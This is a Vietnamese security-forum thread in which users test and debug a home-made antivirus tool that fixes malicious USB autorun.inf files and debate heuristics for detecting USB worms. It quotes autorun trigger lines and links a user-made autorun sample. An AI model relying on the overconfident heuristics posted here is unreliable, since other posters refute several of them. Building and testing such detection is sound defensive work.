Bản chất autorun là có ích chứ không có hại, làm vậy sẽ phiền phức cho người dùng vì phải trả lời quá nhiều trường hợp. Người dùng chỉ sử dụng tool này khi cần thiết thôi.
Nếu chỉ delete những dòng được bôi đen thôi thì tốt hơn, Em luôn để một file Autorun ổ D để kích hoạt một file .exe có tác dụng dọa và cản trở gà vào ổ này Em kô bôi đen nó thế mà cái này của bác delete mất của em  
Phiên bản 1.0 là xoá tất cả, 1.1 đã cho phép xoá file cần thiết.
Nó chỉ hiện được cái file Autorun.inf thôi còn cái cột fileExecute kia ghi là kô có. Em đã +s +h cho cái file exe kia  
Như trên đã nói, thuộc tính của file không quan trọng. Dù bạn có thiết lập +h+s cho file vẫn có thể biết được. Có lẽ là chương trình check path không đúng nên hiển thị "not available". Bạn có thể up file autorun.inf lên đây không ? Sở dĩ chương trình không hiện lên path là vì muốn người dùng dễ phân biệt, tại sao cái ổ đĩa double-click sau khi diệt virus không ra, là vì nó "not available" ;). @gsmth: Mục đích của chương trình này không phải là vô hiệu hoá chức năng AutoPlay (chức năng này đã được add vào trong tool Enabler) mà là fix những file AutoRun nào bị lỗi khiến người dùng không mở ổ đĩa ra được. Hoàng vừa update lên AutoRunFixer 1.1: Thay đổi: + Cho phép xoá file có thuộc tính chỉ đọc + Cho phép lựa chọn autorun trước khi xoá Download: Code:
http://fasthelper.fire-lion.com/download/AutoRunFixer.exe

]]>
/hvaonline/posts/list/10351.html#63759 /hvaonline/posts/list/10351.html#63759 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#63772 /hvaonline/posts/list/10351.html#63772 GMT Re: Thử nghiệm chương trình diệt Virus mới

LeVuHoang wrote:
Như trên đã nói, thuộc tính của file không quan trọng. Dù bạn có thiết lập +h+s cho file vẫn có thể biết được. Có lẽ là chương trình check path không đúng nên hiển thị "not available". Bạn có thể up file autorun.inf lên đây không ?  
cả Autorun.inf lẫn .exe đây bác: http://www.freewebtown.com/tauma/data/Test.zip Hôm nay cắm USB test thử cái 1.1. Em thấy nó kô phát hiện ra Autorun trong USB bác ạ :((. Em còn tạo thêm một cái Autorun ở ổ E và nó chỉ phát hiện ra 2 file Autorun.inf ở D và E thôi, nó vẫn kô phát hiện ra file .exe. Cái zip trên là cái đã em dùng để test.
Bản chất autorun là có ích chứ không có hại, làm vậy sẽ phiền phức cho người dùng vì phải trả lời quá nhiều trường hợp. Người dùng chỉ sử dụng tool này khi cần thiết thôi.  
Em nghĩ Autorun chi có ích với những người biết về nó một chút. Đa số worm được lây hiện nay là do người dùng kô biết gì về Autorun vì thế nếu có có câu hỏi nào về autorun cho những người này thì đó chắc chắn là virus rồi. Có thể khắc phục vấn đề phiền phức này bằng cách gán chức năng chọn ổ sẽ kiểm tra. Việc chọn này chỉ làm một lần và soft sẽ lưu sự chọn đó cho cả những lần quét sau. Với chức năng này thì người dùng sẽ loại những ổ có Autorun do mình tạo ra. ]]>
/hvaonline/posts/list/10351.html#63917 /hvaonline/posts/list/10351.html#63917 GMT
Thử nghiệm chương trình diệt Virus mới Em nghĩ Autorun chi có ích với những người biết về nó một chút. Đa số worm được lây hiện nay là do người dùng kô biết gì về Autorun vì thế nếu có có câu hỏi nào về autorun cho những người này thì đó chắc chắn là virus rồi.   Có rất nhiều AutoRun hữu ích như của MS Office, giúp người dùng không cần phân biệt phải chạy file setup nào trong vô số file. Chỉ cần bỏ đĩa vào là install, rất tiện lợi :)]]> /hvaonline/posts/list/10351.html#64128 /hvaonline/posts/list/10351.html#64128 GMT Re: Thử nghiệm chương trình diệt Virus mới

LeVuHoang wrote:
Có rất nhiều AutoRun hữu ích như của MS Office, giúp người dùng không cần phân biệt phải chạy file setup nào trong vô số file. Chỉ cần bỏ đĩa vào là install, rất tiện lợi :)  
Cái đó chỉ có tác dụng ở ổ CD, khi ta cần setup cái gì đó. Liệu có thể làm cho soft có khả năng nhận biết đâu là ổ CD kô bác? Nhận biết sự kiện máy nhận USB. Nếu có nhận biết được thì gán cho cái FastHelper kia chức năng: Nếu thấy USB cắm vô máy thì khởi động cái AutoRunFixer này. Khi cái AutoRunFixer này chạy thì nó kiểm tra Autorun ở tất cả các ổ đã được người dùng đặt, trừ ổ CD. Hoặc kiểm tra cả những ổ mà người dùng đã loại bỏ nhưng hiện kết quả ở một nhóm khác. Nếu người dùng đã biết sử dụng Autorun thì họ cũng cần kiểm tra xem Autorun mình tạo ra có bị virus thay đổi kô (Nhìn vào file kích hoạt là biết, Trừ khi đó là virus tấn công file và nó chui luôn và file .exe chứ kô thay đổi file Autorun :D) ) Liệu có thể tạo một soft AV hoạt động dựa vào việc nhận biết các hoạt động đặc trưng của virus kô bác. Thay vì phải cập nhật từng con. Hoạt động như thế có đỡ tốn tài nguyên máy hơn kô bác. Các hoạt động đặc trưng của virus như: + Thay đổi một vài key trong registry để tự vệ, các chương trình bình thường kô bao giờ có chức năng này-> kiểm tra xem có tồn tại các key khóa registry,Tasmanager, Folder Options(hoặc chức năng ẩn trong folder options) + Các loại worm thì luôn có chức năng tạo Autorun trong USB-> kiểm tra Autorun khi USB cắm vào máy. + Quét các port mà virus hay dùng, nếu phát hiện thì tìm và thông báo file đang sử dụng port đó. + Các file mầm .exe của virus luôn có icon hình cái folder -> kiểm tra icon của các file .exe trong folder người dùng mở. ]]>
/hvaonline/posts/list/10351.html#64138 /hvaonline/posts/list/10351.html#64138 GMT
Thử nghiệm chương trình diệt Virus mới Nếu thấy USB cắm vô máy thì khởi động cái AutoRunFixer này. Khi cái AutoRunFixer này chạy thì nó kiểm tra Autorun ở tất cả các ổ đã được người dùng đặt, trừ ổ CD.   Vậy lỡ khi AutoRun này là do người dùng "có hiểu biết" cố ý xài ;). Ví dụ họ muốn install 1 chương trình nào đó vào... 100 máy bằng USB, thế là tiết kiệm được khối thời gian với AutoPlay đó.
Liệu có thể tạo một soft AV hoạt động dựa vào việc nhận biết các hoạt động đặc trưng của virus kô bác  
Các AV của thế giới và ngay cả của VN ( D32 là một ví dụ ;) ) có vẻ như chưa thành công. Họ đã trang bị chức năng heuristic nhưng vẫn chưa chính xác lắm.
+ Thay đổi một vài key trong registry để tự vệ, các chương trình bình thường kô bao giờ có chức năng này  
Nhưng nếu người dùng "cố ý" dùng chức năng này ? Như tiệm internet ? Disable để không cho quậy phá ? Bạn đừng nói "hãy dùng DeepFreeze đi", không phải ai cũng biết việc này hoặc thích dùng cách này.
+ Các loại worm thì luôn có chức năng tạo Autorun trong USB-> kiểm tra Autorun khi USB cắm vào máy.  
Cái này thì phát biểu cực kỳ theo cảm tính. Không phải các loại worm thì LUÔN có chức năng tạo AutoRun
+ Quét các port mà virus hay dùng, nếu phát hiện thì tìm và thông báo file đang sử dụng port đó.  
Không có port nào mà virus hay dùng cả, tất cả tuỳ thuộc vào developers.
+ Các file mầm .exe của virus luôn có icon hình cái folder -> kiểm tra icon của các file .exe trong folder người dùng mở.  
Cái này phát biểu y như câu trên. Không phải loại nào cũng LUÔN có hình folder. Ngoài ra, nếu dùng hình khác như Text File, Zip, JPEG... thì thế nào... :) Do bạn chưa tiếp xúc nhiều loại, đặt ra nhiều tình huống, làm sao vừa để phòng chống, vừa hợp với người dùng nên còn phát biểu cảm tính quá. Bảo mật luôn phải cân bằng với dễ sử dụng nhưng không thế nào chấp nhận việc "thấy icon folder, disable registry, mở port mà thông báo là virus được" :))]]>
/hvaonline/posts/list/10351.html#64140 /hvaonline/posts/list/10351.html#64140 GMT
Re: Thử nghiệm chương trình diệt Virus mới Vậy lỡ khi AutoRun này là do người dùng "có hiểu biết" cố ý xài ;). Ví dụ họ muốn install 1 chương trình nào đó vào... 100 máy bằng USB, thế là tiết kiệm được khối thời gian với AutoPlay đó.   Nếu người dùng có hiểu biết thì họ chỉ cần ấn một cái cancel rùi exit luôn cái AV để tiếp tục làm việc :)). Cái này sẽ rất hữa dụng cho những người kô hiểu biết mấy về virus, như mấy nhân viên văn phòng chỉ biết biết dùng word với Excel, những người thường xuyên ngồi ở 100 cái máy kia :D) Em nghĩ với những người hiểu biết thì kô cần dùng tới AV kiểu này :D) Mà đối tượng bị dính virus kô phải là những người hiểu biết :)) mà đa phần là những người kô hiểu biết vì thế muốn soft hoạt động có hiệu quả thì phải dựa theo thói quen dùng máy của những đối tượng này :)) ]]> /hvaonline/posts/list/10351.html#64142 /hvaonline/posts/list/10351.html#64142 GMT Re: Thử nghiệm chương trình diệt Virus mới
Liệu có thể tạo một soft AV hoạt động dựa vào việc nhận biết các hoạt động đặc trưng của virus kô bác 
Các AV của thế giới và ngay cả của VN ( D32 là một ví dụ ;) ) có vẻ như chưa thành công. Họ đã trang bị chức năng heuristic nhưng vẫn chưa chính xác lắm.   Sao bác kô thử đi theo con đường này? đi theo con đương mà người khác chưa đi, hay chưa đi được là cách đến thành công vang dội nhất :))
+ Thay đổi một vài key trong registry để tự vệ, các chương trình bình thường kô bao giờ có chức năng này  
Nhưng nếu người dùng "cố ý" dùng chức năng này ? Như tiệm internet ? Disable để không cho quậy phá ? Bạn đừng nói "hãy dùng DeepFreeze đi", không phải ai cũng biết việc này hoặc thích dùng cách này 
Khắc phục bằng cách tạo chức năng chấp nhận sự thay đổi đó. Soft chỉ hiển thì những key bị thay đổi so với lần quét trước. Em cũng muốn có soft theo dõi sự thay đổi của registry mà kô biết tìm thế nào:))
+ Các loại worm thì luôn có chức năng tạo Autorun trong USB-> kiểm tra Autorun khi USB cắm vào máy.  
Cái này thì phát biểu cực kỳ theo cảm tính. Không phải các loại worm thì LUÔN có chức năng tạo AutoRun  
Đúng là LUÔN thì sai bét rùi :)) nhưng nói là THƯỜNG thì em tin là chính xác :)) Em chưa thấy chương trình nào có chức năng tạo Autorun liên tục trong USB :)) Kô phải worm nào cũng có chức năng tạo Autorun trong USB nhưng nếu tạo ra Autorun trong USB thì 99,99% là worm :))
+ Các file mầm .exe của virus luôn có icon hình cái folder -> kiểm tra icon của các file .exe trong folder người dùng mở. 
Cái này phát biểu y như câu trên. Không phải loại nào cũng LUÔN có hình folder. Ngoài ra, nếu dùng hình khác như Text File, Zip, JPEG... thì thế nào... :)  
Gọi là LUÔN lại sai bét tiếp :D) Kô phải tất cả Virus đều dùng icon hình cái folder nhưng nếu dùng thì cũng 99,99% là virus :)) Các hình khác thì bỏ qua nhưng hình folder thì chắc chắn phải diệt. Ngụy trang hình cái folder để lừa victim là cách virus rất hay dùng và rất hiệu quả đối với người dùng kém hiểu biết.
Do bạn chưa tiếp xúc nhiều loại, đặt ra nhiều tình huống, làm sao vừa để phòng chống, vừa hợp với người dùng nên còn phát biểu cảm tính quá. Bảo mật luôn phải cân bằng với dễ sử dụng nhưng không thế nào chấp nhận việc "thấy icon folder, disable registry, mở port mà thông báo là virus được" 
Em nghĩ đó là những biểu hiện thông thường, phổ biến nhất của virus, có thể chưa đủ nhưng tỷ lệ đúng là rất cao, kô thể bỏ qua. Em nghĩ tạo ra một soft kiểm tra những biểu hiện trên thì có thể phát hiện ra đa số virus hiện nay. nếu virus kô có những biểu hiện trên thì khả năng lây nhiễm của nó là kô cao. ]]>
/hvaonline/posts/list/10351.html#64171 /hvaonline/posts/list/10351.html#64171 GMT
Thử nghiệm chương trình diệt Virus mới Nếu người dùng có hiểu biết thì họ chỉ cần ấn một cái cancel rùi exit luôn cái AV để tiếp tục làm việc . Cái này sẽ rất hữa dụng cho những người kô hiểu biết mấy về virus, như mấy nhân viên văn phòng chỉ biết biết dùng word với Excel, những người thường xuyên ngồi ở 100 cái máy kia   Tâm lý của người ít kinh nghiệm là gặp gì cũng "yes", hỏi có chạy file không, yes, yes yes...
Mà đối tượng bị dính virus kô phải là những người hiểu biết mà đa phần là những người kô hiểu biết vì thế muốn soft hoạt động có hiệu quả thì phải dựa theo thói quen dùng máy của những đối tượng này  
Bạn có chắc người "có hiểu biết" không bị dính virus ;) ? Không phải lúc nào virus cũng "có process", nên có AV là 1 điều cần thiết
Sao bác kô thử đi theo con đường này? đi theo con đương mà người khác chưa đi, hay chưa đi được là cách đến thành công vang dội nhất  
Cái cách của bạn Hoàng đã thử cách đây 5 năm trước nhưng sau này nghĩ lại thấy nó stupid quá nên không áp dụng :).
Khắc phục bằng cách tạo chức năng chấp nhận sự thay đổi đó. Soft chỉ hiển thì những key bị thay đổi so với lần quét trước. Em cũng muốn có soft theo dõi sự thay đổi của registry mà kô biết tìm thế nào  
Với mỗi lần quét, bạn snap registry lại. Sau đó so sánh giữa 2 lần quét, có khi là 1 ngày, bạn biết là giá trị registry thay đổi bao nhiêu không ? Tóm lại là càng phức tạp lại càng không hiệu quả.
nếu tạo ra Autorun trong USB thì 99,99% là worm Kô phải tất cả Virus đều dùng icon hình cái folder nhưng nếu dùng thì cũng 99,99% là virus Các hình khác thì bỏ qua nhưng hình folder thì chắc chắn phải diệt  
Miễn bình luận, để cho... người khác có ý kiến & nhận xét :)
Em nghĩ đó là những biểu hiện thông thường, phổ biến nhất của virus, có thể chưa đủ nhưng tỷ lệ đúng là rất cao, kô thể bỏ qua  
Bạn đã khảo sát trên bao nhiêu loại Worm, trên 1000 chưa ;) ?]]>
/hvaonline/posts/list/10351.html#64205 /hvaonline/posts/list/10351.html#64205 GMT
Re: Thử nghiệm chương trình diệt Virus mới Tâm lý của người ít kinh nghiệm là gặp gì cũng "yes", hỏi có chạy file không, yes, yes yes...  Nếu họ đã ít kinh nghiệm thì họ cũng sẽ kô biết sử dụng những cái virus hay sử dụng -> dù họ có yes "bừa" thì thì tỉ lệ đúng cũng rất cao :mrgreen: Còn nếu là người có hiểu biết thì họ có thể seting lại một chút cho phù hợp với yêu cầu của mình.
Bạn có chắc người "có hiểu biết" không bị dính virus ;) ? Không phải lúc nào virus cũng "có process", nên có AV là 1 điều cần thiết  
Kô phải người "có hiểu biết về virus" kô bị dính virus mà là tỷ lệ bị nhiễm rất thấp. Kô phải virus nào cũng có process nhưng cũng đâu có AV nào diệt được hết tất cả các loại virus :))
Với mỗi lần quét, bạn snap registry lại. Sau đó so sánh giữa 2 lần quét, có khi là 1 ngày, bạn biết là giá trị registry thay đổi bao nhiêu không ? Tóm lại là càng phức tạp lại càng không hiệu quả 
Chỉ quét những key có tác dụng kích hoạt file nào đó và những key có tác dụng khóa những chức năng của Win mà virus hay khóa thui chứ có quét hết tất cả đâu bác.
Bạn đã khảo sát trên bao nhiêu loại Worm, trên 1000 chưa ;) ?  
Gần như tất cả những loại worm em gặp đều như vậy :)) đó là những loại phổ biến trong thời gian qua(khoảng 1 năm trở lại đây) Em kô nhớ là có con nào có biểu hiện khác như thía :)) Bác có thể cho em một cái tên của worm kô có những biểu hiện như vậy kô(cái tên thôi chứ bác dừng cho file mầm :mrgreen: bây giờ em kô "nghiên cú" được đâu.)dù kô có Process thì nó cũng phải lây qua USB chứ bác. Worm mà kô lây qua USB thì sức lây kô thể mạnh được.]]>
/hvaonline/posts/list/10351.html#64237 /hvaonline/posts/list/10351.html#64237 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#64240 /hvaonline/posts/list/10351.html#64240 GMT Thử nghiệm chương trình diệt Virus mới Tui vừa mới đọc qua một trang web, nói về chuyện kiểm tra log của các trình diệt, sau đó kiểm tra hệ thống quarantee của trình diệt và lấy mẫu con malware ra. Chuyện này vẫn còn tìm hiểu, mod nghiên cứu chuyện này, có thể nó giúp ít gì đó.   Vẫn chưa hiểu, tmd có thể nói rõ thêm không ?
Adware 2007 của lavasoft, có chức năng kiểm tra host file của windows. Mod nghiên cứu thử chức năng này.  
Thực ra là có, nhưng mà... chưa public thôi á :D]]>
/hvaonline/posts/list/10351.html#64301 /hvaonline/posts/list/10351.html#64301 GMT
Re: Thử nghiệm chương trình diệt Virus mới

Ghost Ship wrote:
cả Autorun.inf lẫn .exe đây bác: http://www.freewebtown.com/tauma/data/Test.zip Hôm nay cắm USB test thử cái 1.1. Em thấy nó kô phát hiện ra Autorun trong USB bác ạ :((. Em còn tạo thêm một cái Autorun ở ổ E và nó chỉ phát hiện ra 2 file Autorun.inf ở D và E thôi, nó vẫn kô phát hiện ra file .exe. Cái zip trên là cái đã em dùng để test.  
Hoàng đã upgrade lên phiên bản 1.2, hy vọng lỗi được chỉnh.
Những items nào được tô màu đỏ có nghĩa là file thực thi không tồn tại. Bạn có thể dùng "Check invalid" để chọn và xóa các file cùng lúc.]]>
/hvaonline/posts/list/10351.html#64312 /hvaonline/posts/list/10351.html#64312 GMT
Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#64325 /hvaonline/posts/list/10351.html#64325 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#64386 /hvaonline/posts/list/10351.html#64386 GMT Re: Thử nghiệm chương trình diệt Virus mới

LeVuHoang wrote:

Ghost Ship wrote:
cả Autorun.inf lẫn .exe đây bác: http://www.freewebtown.com/tauma/data/Test.zip Hôm nay cắm USB test thử cái 1.1. Em thấy nó kô phát hiện ra Autorun trong USB bác ạ :((. Em còn tạo thêm một cái Autorun ở ổ E và nó chỉ phát hiện ra 2 file Autorun.inf ở D và E thôi, nó vẫn kô phát hiện ra file .exe. Cái zip trên là cái đã em dùng để test.  
Hoàng đã upgrade lên phiên bản 1.2, hy vọng lỗi được chỉnh.
Những items nào được tô màu đỏ có nghĩa là file thực thi không tồn tại. Bạn có thể dùng "Check invalid" để chọn và xóa các file cùng lúc. 
Lần này thì ổn rồi bác ạ :)) Nhưng bác có thể phát triển thêm cho nó có thêm các chức năng: + Cho thêm cột filezise của file được kích hoạt. + Cho thêm ô tick chứng thực để đăng ký Autorun do người dùng tạo ra. Soft sẽ lưu thông tin về Autorun này và file được kích hoạt. ở lần quét sau nếu thấy thay đổi thì sẽ báo và chỉ ra sự thay đổi còn kô sẽ bỏ qua.(đề phòng virus tấn công vào file được kích hoạt hoặc thay thế toàn bộ Autorun) + Chạy ẩn và sẽ kiểm tra tất cả các ổ mỗi khi USB được cắm vào máy và sẽ hiện lên nếu thấy USB hoặc ổ nào đó có Autorun hoặc có sự thay đổi ở Autorun chứng thực. Hay là cho nó vào danh sách Tools của FastHelper và gán cho FastHelper chức năng gọi tools này ra chạy hide để kiểm tra nếu kô thấy gì lạ thì lại Exit luôn :)) ]]>
/hvaonline/posts/list/10351.html#64473 /hvaonline/posts/list/10351.html#64473 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#64739 /hvaonline/posts/list/10351.html#64739 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#64758 /hvaonline/posts/list/10351.html#64758 GMT Thử nghiệm chương trình diệt Virus mới

LeVuHoang wrote:
Cơ bản là autorun mỗi device mỗi khác nhau, lưu lại là không ổn :) 
Khác nhau? Em nghĩ trong file Autorun.inf chỉ cần lưu thông tin ở những dòng có chức năng kích hoạt file như:
open=*.exe shellexecute=*.exe shell\Auto\command=*.exe 
Mà cái dòng shell\Auto\command=*.exe có ý nghĩa gì thế bác Hoàng? Rồi tìm đến file được kích hoạt lưu những thông tin như: filename, Filezese là đủ Như vậy là đủ để vô hiệu kiểu lây bằng Autorun của mấy con worm hiện nay. Trước mắt cứ thế đã sau này nếu Autorun phát triển thêm kiểu gì đó thì bác lại phát triển lo gì :mrgreen: Cái v1.2 này có vấn đề bác ạ : khi delete Autorun Win hiên ra bảng báo lỗi: Error occurred yêu cầu "Send Error Report" và chỗ chứa file AutoRunFixer.exe có thêm file AutoRunFixer_CHAOS.elf Nội dung lỗi như sau:
Access violation at address 004f04a8 in module "AutoRunFixer.exe". read of address 00000004  
Khi delete nó chỉ delete file Autorun.inf chứ kô delete file *.exe Mà trong properties -> File Version của cả 3 phiên bản đều ghi 1.0.0.0 :mrgreen: ]]>
/hvaonline/posts/list/10351.html#64843 /hvaonline/posts/list/10351.html#64843 GMT
Thử nghiệm chương trình diệt Virus mới

situdien wrote:
thât khong biet download nhu the nao ca nhung tui thay cai nay cung hay nen co gang download ve dung the , ai de lam mai ma cha duoc, co ai bit thi chi dun di coi 
down ở đây này bạn: http://fasthelper.fire-lion.com/download/AutoRunFixer.exe]]>
/hvaonline/posts/list/10351.html#64844 /hvaonline/posts/list/10351.html#64844 GMT
Thử nghiệm chương trình diệt Virus mới Mà cái dòng shell\Auto\command=*.exe có ý nghĩa gì thế bác Hoàng?   Bạn search google để biết ý nghĩa của dòng này
Khi delete nó chỉ delete file Autorun.inf chứ kô delete file *.exe  
Quyết định delete file thực thi hay không là ở người dùng. Chương trình có tên là AutoRun FIXER, mục đích là fix những file autorun nào bị lỗi không double-click mở ổ đĩa ra được.
Mà trong properties -> File Version của cả 3 phiên bản đều ghi 1.0.0.0  
Cái này không quan trọng, quan trọng là version ở chương trình chính.]]>
/hvaonline/posts/list/10351.html#65245 /hvaonline/posts/list/10351.html#65245 GMT
Thử nghiệm chương trình diệt Virus mới

LeVuHoang wrote:
Mà cái dòng shell\Auto\command=*.exe có ý nghĩa gì thế bác Hoàng?  
Bạn search google để biết ý nghĩa của dòng này
Khi delete nó chỉ delete file Autorun.inf chứ kô delete file *.exe  
Quyết định delete file thực thi hay không là ở người dùng. Chương trình có tên là AutoRun FIXER, mục đích là fix những file autorun nào bị lỗi không double-click mở ổ đĩa ra được.
Mà trong properties -> File Version của cả 3 phiên bản đều ghi 1.0.0.0  
Cái này không quan trọng, quan trọng là version ở chương trình chính. 
Bạn thử dùng bản 1.3 xem còn bị lỗi trên không. Link download như cũ: http://fasthelper.fire-lion.com/download/AutoRunFixer.exe]]>
/hvaonline/posts/list/10351.html#65249 /hvaonline/posts/list/10351.html#65249 GMT
Thử nghiệm chương trình diệt Virus mới http://fasthelper.fire-lion.com/ hoặc http://fasthelper.vnsi4h.com/ Xem về thay đổi, chức năng được thêm vào phiên bản hiện tại: http://fasthelper.fire-lion.com/whatsnew.html]]> /hvaonline/posts/list/10351.html#65254 /hvaonline/posts/list/10351.html#65254 GMT Re: Thử nghiệm chương trình diệt Virus mới

LeVuHoang wrote:
Bạn thử dùng bản 1.3 xem còn bị lỗi trên không. Link download như cũ: http://fasthelper.fire-lion.com/download/AutoRunFixer.exe  
Ổn rồi bác ạ :)) Cái chức năng "cấu hình" của FastHelper sử dụng thế nào bac Hoang ơi? chẳng thấy gì ở list cả. Hay là update lỗi :(( lúc nãy update lâu kinh(mất khoảng 15') ]]>
/hvaonline/posts/list/10351.html#65297 /hvaonline/posts/list/10351.html#65297 GMT
Re: Thử nghiệm chương trình diệt Virus mới

Ghost Ship wrote:

LeVuHoang wrote:
Bạn thử dùng bản 1.3 xem còn bị lỗi trên không. Link download như cũ: http://fasthelper.fire-lion.com/download/AutoRunFixer.exe  
Ổn rồi bác ạ :)) Cái chức năng "cấu hình" của FastHelper sử dụng thế nào bac Hoang ơi? chẳng thấy gì ở list cả. Hay là update lỗi :(( lúc nãy update lâu kinh(mất khoảng 15')  
hmm... hay là GS download thử bản cài đặt về xem. Phần cấu hình nó sẽ như thế này:
]]>
/hvaonline/posts/list/10351.html#65314 /hvaonline/posts/list/10351.html#65314 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#65381 /hvaonline/posts/list/10351.html#65381 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#65387 /hvaonline/posts/list/10351.html#65387 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#65389 /hvaonline/posts/list/10351.html#65389 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#65395 /hvaonline/posts/list/10351.html#65395 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#65398 /hvaonline/posts/list/10351.html#65398 GMT Thử nghiệm chương trình diệt Virus mới

LeVuHoang wrote:
GS, tmd: Đã hết bị lỗi chưa ? 
Đúng là công đoạn update có vấn đề bác ạ. Em down bản mới về cài lại chỉ mất có 30s mà đủ cả như ảnh của bác. Tạm thời em chưa có thêm ý kiến :)) ]]>
/hvaonline/posts/list/10351.html#65399 /hvaonline/posts/list/10351.html#65399 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#65405 /hvaonline/posts/list/10351.html#65405 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#65841 /hvaonline/posts/list/10351.html#65841 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#65931 /hvaonline/posts/list/10351.html#65931 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#66001 /hvaonline/posts/list/10351.html#66001 GMT Re: Thử nghiệm chương trình diệt Virus mới Fake Security Software. Một số người sử dụng bình thường hay dính các loại vớ vẫn này. ]]> /hvaonline/posts/list/10351.html#66408 /hvaonline/posts/list/10351.html#66408 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#66414 /hvaonline/posts/list/10351.html#66414 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#66530 /hvaonline/posts/list/10351.html#66530 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#67679 /hvaonline/posts/list/10351.html#67679 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#67892 /hvaonline/posts/list/10351.html#67892 GMT Thử nghiệm chương trình diệt Virus mới Code:
http://fasthelper.fire-lion.com/download/FastHelperSetup529.zip
Vẫn hiện ra 5.2.9 mà ? Tui nhiên, lỗi với cái game boom thì vẫn chưa có cách giải quyết :) @tmd: Tắt chức năng warning trong phần Cấu Hình ah. Hoàng vừa build 1 cái help ở đây: http://fasthelper.fire-lion.com/help/]]>
/hvaonline/posts/list/10351.html#67921 /hvaonline/posts/list/10351.html#67921 GMT
Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#67936 /hvaonline/posts/list/10351.html#67936 GMT Thử nghiệm chương trình diệt Virus mới Lúc này em mới chơi dại, là nhấp vô cái link huynh để download về cài, trong khi chưa gỡ bản cũ ra, hậu quả máy bị đứng gần 2 phút   hmmm... tại sao click vào link lại đứng gần 2 phút ? Tại vì bản FastHelper cũ đang chạy nên bị đứng ?
sau khi nhấn thông báo cập nhật. Không thấy thông báo cập nhật xong, biểu tượng chương trình ở system tray cũng không thấy. Windows báo virtual memory is too low mặc dù máy 2GB RAM  
Task manager bị khóa, không thể mở bằng Ctrl+Alt+Del, nhấp vào biểu tượng FHelper thì con chuột bảo chờ, rất lâu rồi cũng vẫn không có thay đổi gì.  
Tiếp tục: đã gỡ bản cũ cài lại, bi giờ lỗi có vẻ phát sinh sau khi đồng ý tải bản cập nhật 5.3.0, treo máy 2 lần, hiện tượng màn hình bị đứng  
Bạn hãy thử theo những bước sau: 1. Gỡ bỏ bản cũ (nếu cần thiết thì restart lại) 2. Cài bản 5.3.0 Xem còn còn hiện tượng này không. Còn đối với trò boom thì Hoàng chưa có ý kiến, có lẽ phải chuyển sang cách khác cho chế độ auto protect
PS: cho hỏi ngoài lề chút, sao giống BKAV ở chỗ Windows Security Center không nhận đây là chương trình diệt virus vậy huynh  
Là vì các hãng AV trên có sự trao đổi với MS để có thể nhận ra được sản phẩm của mình :)]]>
/hvaonline/posts/list/10351.html#67940 /hvaonline/posts/list/10351.html#67940 GMT
Re: Thử nghiệm chương trình diệt Virus mới
Sau khi nhấn Check for update
Sau khi nhấn Option
]]>
/hvaonline/posts/list/10351.html#68040 /hvaonline/posts/list/10351.html#68040 GMT
Thử nghiệm chương trình diệt Virus mới Bạn uninstall rồi cài lại mới từ file setup xem (cho cả 2 máy) ? ]]> /hvaonline/posts/list/10351.html#68074 /hvaonline/posts/list/10351.html#68074 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#68107 /hvaonline/posts/list/10351.html#68107 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#68150 /hvaonline/posts/list/10351.html#68150 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#68839 /hvaonline/posts/list/10351.html#68839 GMT Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#68881 /hvaonline/posts/list/10351.html#68881 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#69008 /hvaonline/posts/list/10351.html#69008 GMT Thử nghiệm chương trình diệt Virus mới http://weblog.esetsoftware.com/ + F-Secure: http://www.f-secure.com/weblog + Kaspersky: http://www.viruslist.com/en/weblog + McAfee: http://www.avertlabs.com/research/blog/ + Microsoft OneCare: http://windowsonecare.spaces.live.com/ + PandaLabs: http://blogs.pandasoftware.com/blogs/pandalabs/default.aspx + Symantec: http://www.symantec.com/enterprise/security_response/weblog/ + TrendMicro: http://servicecenter.antivirus.com/malwareblog/diary/ Đôi lúc cũng có những comment buồn cười của các analyser:
http://weblog.esetsoftware.com/2005/03/18/need-a-compiler-kit-get-infected-with-jeans-worm/#respond]]>
/hvaonline/posts/list/10351.html#69053 /hvaonline/posts/list/10351.html#69053 GMT
